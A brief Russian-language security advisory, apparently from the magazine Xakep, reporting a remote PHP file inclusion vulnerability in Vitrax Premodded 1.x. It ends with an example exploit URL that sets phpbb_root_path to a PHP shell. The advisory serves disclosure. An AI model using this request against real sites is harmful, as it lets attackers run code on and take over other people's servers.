Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Vitrax Premodded 1.x
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.
Пример:
http://[target]/[path]/includes/functions_portal.php?phpbb_root_path=phpshell